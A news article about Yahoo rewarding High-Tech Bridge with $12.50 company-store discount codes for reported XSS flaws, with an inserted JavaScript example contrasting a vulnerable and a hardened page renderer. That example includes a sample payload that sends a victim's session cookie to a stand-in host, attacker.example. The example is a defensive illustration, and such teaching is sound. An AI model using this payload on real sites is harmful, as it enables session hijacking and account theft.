Yahoo slammed over $12.50 security flaw rewards

Security researchers claim paltry bounty will not encourage others to share their findings.


Yahoo has been criticised for allegedly rewarding security researchers who uncover flaws in its products with discounts on branded goods sold through its company store.

IT security services provider High-Tech Bridge claims to have been offered a $12.50 discount code for each security flaw it uncovered, which was only redeemable in the Yahoo Company Store.

The organisation said it was offered the reward by Yahoo after discovering several cross-site scripting (XSS) vulnerabilities.

Each one reportedly would have allowed any Yahoo email account to be compromised by tricking its owner into clicking a specially crafted link while logged into the site, since script injected that way runs in the victim's browser with the victim's session.
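The following is an added illustration of the general pattern described above, written for this article; it is not code from the article and not the flaws High-Tech Bridge reported, whose technical details are not given here. It assumes a hypothetical search page that echoes a `q` query parameter into its HTML, and uses placeholder domains (`hypothetical-mail.example`, `attacker.example`). The vulnerable renderer is shown beside a hardened one that encodes the parameter for the HTML text context.

```javascript
// Added example: a minimal reflected-XSS pattern and its fix.
// Illustrative code for this article; NOT the reported Yahoo flaw.
// Assumes a hypothetical search page that echoes "q" back into HTML.

// Vulnerable: the query string is concatenated straight into the page,
// so a "<script>" in the link becomes a live script in the victim's session.
function renderVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// Escape the characters that let attacker input change HTML context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened: same page, but the parameter is encoded for the HTML text context.
function renderHardened(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Pull the "q" parameter out of a crafted link, as the server would.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name) ?? "";
}

// Crude check used below: does the rendered page contain a live <script>
// tag or an inline event handler under the attacker's control?
function containsActiveScript(html) {
  return /<script\b/i.test(html) || /\son\w+\s*=/i.test(html);
}

// Constructed sample: a link an attacker might send to a logged-in victim.
// The injected script exfiltrates the session cookie to the attacker's host.
// Both domains are placeholders, not real sites.
const craftedLink =
  "https://hypothetical-mail.example/search?q=" +
  encodeURIComponent(
    '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'
  );

// Returns whether each renderer lets the payload execute.
function demo() {
  const q = queryParam(craftedLink, "q");
  return {
    vulnerable: containsActiveScript(renderVulnerable(q)), // true: payload runs
    hardened: containsActiveScript(renderHardened(q)),     // false: inert text
  };
}

console.log(demo());
```

Output encoding must match the context the value lands in (HTML text here; attribute, URL and JavaScript contexts need different encoders), and a Content-Security-Policy plus `HttpOnly` session cookies limit what an injected script can do if encoding is missed somewhere.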

The company's research team said it notified Yahoo of the flaws on Monday 23 September, but claims only two of them were acknowledged within 48 hours of the report being made.

"Yahoo warmly thanked us for reporting the vulnerabilities and offered us...12.50 USD reward per one vulnerability," the company said in a statement.

"Moreover, this sum was given as a discount code that can only be used in the Yahoo Company Store, which sells Yahoo's corporate T-shirts, cups, pens and accessories."

All of the vulnerabilities exposed by High-Tech Bridge, including another it reported that Yahoo claimed had already been discovered, have now been patched.

Ilia Kolochenko, High-Tech Bridge CEO, has called on Yahoo to rethink its rewards scheme, because it offers little incentive to report bugs.

"Paying several dollars per vulnerability is a bad job and won't motivate people to report security vulnerabilities to them, especially when such vulnerabilities can be easily sold on the black market for a much higher price," he said.

"If Yahoo cannot afford to spend money on its corporate security, it should at least try to attract security researchers by other means. Otherwise none of Yahoo's customers are safe."

IT Pro approached Yahoo for comment on this story, but was still awaiting a response at the time of publication.

This is the second time in less than a week that Yahoo's attitude to security has come under scrutiny.

The company's decision to reuse inactive email addresses has led to complaints by some users that they've received personal emails intended for the previous owner.
